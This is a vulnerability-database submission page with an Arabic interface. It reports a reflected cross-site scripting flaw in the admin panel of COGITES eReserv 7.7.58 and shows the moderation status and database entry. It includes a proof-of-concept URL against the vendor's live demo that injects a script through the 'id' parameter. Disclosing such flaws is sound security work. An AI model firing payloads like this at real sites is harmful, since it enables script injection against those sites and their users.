إرسال #274372: COGITES eReserv v7.7.58 Reflected XSS (authenticated)المعلومات

عنوانCOGITES eReserv v7.7.58 Reflected XSS (authenticated)
الوصفYou will have to authenticate to their demo online for the purpose of this PoC On admin panel (Authenticated): The "id=" parameter on tenancyDetail.php is vulnerable to reflected XSS. proof of concept: https://my.e-reserv.com/00000000ereservpro/front/admin/tenancyDetail.php?id=id=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
المستخدم
 rubx (UID 62535)
ارسال28/01/2024 05:57 PM (2 سنوات منذ)
الاعتدال29/01/2024 02:35 PM (21 hours later)
الحالةتمت الموافقة
إدخال VulDB252303 [Cogites eReserv 7.7.58 tenancyDetail.php معرف البرمجة عبر المواقع]
النقاط15

Interested in the pricing of exploits?

See the underground prices here!